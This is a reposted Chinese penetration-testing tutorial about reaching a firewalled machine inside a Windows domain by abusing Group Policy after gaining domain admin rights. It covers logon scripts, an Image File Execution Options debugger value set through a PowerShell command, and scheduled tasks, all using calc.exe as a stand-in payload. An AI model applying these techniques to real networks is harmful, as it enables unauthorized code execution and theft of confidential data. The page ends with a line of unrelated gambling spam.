<small id="hjex1"></small>

        <tbody id="hjex1"></tbody>
      1. <menuitem id="hjex1"></menuitem>
        <menuitem id="hjex1"></menuitem>

          安基網 首頁 安全 滲透測試 查看內容

          域內突破防火墻獲取目標機器權限

          2019-3-11 12:03| 投稿: xiaotiger |來自: 互聯網


          免責聲明:本站系公益性非盈利IT技術普及網,本文由投稿者轉載自互聯網的公開文章,文末均已注明出處,其內容和圖片版權歸原網站或作者所有,文中所述不代表本站觀點,若有無意侵權或轉載不當之處請從網站右下角聯系我們處理,謝謝合作!

          摘要: 情景如下在域中獲取到了域管理員權限,其中一臺機器上面存放絕密資料,但是該機器的防火墻是打開的,所有入站請求都被攔截,也就是說不能進行遠程桌面連接、遠程過程調用(RPC)等方式執行命令。思路1- 啟動腳本在域控制器上配置組策略,用戶下次登錄時運行我們指定好的腳本服務器管理器-功能-組策略管 ...

          情景如下

          在域中獲取到了域管理員權限,其中一臺機器上面存放絕密資料,但是該機器的防火墻是打開的,所有入站請求都被攔截,也就是說不能進行遠程桌面連接、遠程過程調用(RPC)等方式執行命令。

          思路1- 啟動腳本

          在域控制器上配置組策略,用戶下次登錄時運行我們指定好的腳本

          服務器管理器->功能->組策略管理->林: z3r0.com -> Default Domain Policy

          右鍵點擊編輯

          用戶配置->windows 設置 -> 登錄

          雙擊登錄

          將腳本放到USERScriptsLogon目錄下

          這里的exploit.bat 只是彈出一個計算器

          添加好后,坐等下次用戶登錄時觸發

          效果圖

          思路二、通過遠程修改注冊表方式

          通過修改GptTmpl.inf文件,每隔兩小時請求更新組策略的時候在域控制器上構造好GptTmpl.inf文件,在注冊表中添加一個debug調試器,執行命令

          詳細參考

          https://www.anquanke.com/post/id/85074
          

          具體利用方法如下

          在域控制器上執行

          powershell
          Import-Module GroupPolicy
          Set-GPRegistryValue -Name "Default Domain Policy" -ValueName "debugger" -Value "\z3r0.comSYSVOLcalc.exe" -Type String -Key "HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionImage File Execution Optionsexplorer.exe"
          

          當用戶運行資源管理器時會執行放在域控制器共享中的calc.exe

          思路三、計劃任務

          前兩種有一個缺陷就是需要用戶交互,萬一這臺機器一直沒有人上去操作豈不是一直獲取不了權限?

          不存在的,通過域組策略給它添加一個計劃任務。

          在域控制器上打開組策略編輯器

          用戶配置->首選項->控制面板設置->計劃任務

          新建->計劃任務

          等兩小時域用戶更新策略時,計劃任務就會刷新出來

          可以看到刷新策略后計劃任務添加上來了

          原創文章,作者:M0tto1n,如若轉載,請注明出處:http://www.mottoin.com/article/intranet/113302.html



          小編推薦:欲學習電腦技術、系統維護、網絡管理、編程開發和安全攻防等高端IT技術,請 點擊這里 注冊賬號,公開課頻道價值萬元IT培訓教程免費學,讓您少走彎路、事半功倍,好工作升職加薪!

          本文出自:https://www.toutiao.com/a6666233749140668940/

          免責聲明:本站系公益性非盈利IT技術普及網,本文由投稿者轉載自互聯網的公開文章,文末均已注明出處,其內容和圖片版權歸原網站或作者所有,文中所述不代表本站觀點,若有無意侵權或轉載不當之處請從網站右下角聯系我們處理,謝謝合作!


          鮮花

          握手

          雷人

          路過

          雞蛋

          相關閱讀

          最新評論

           最新
          返回頂部
          北京赛车高手经验分享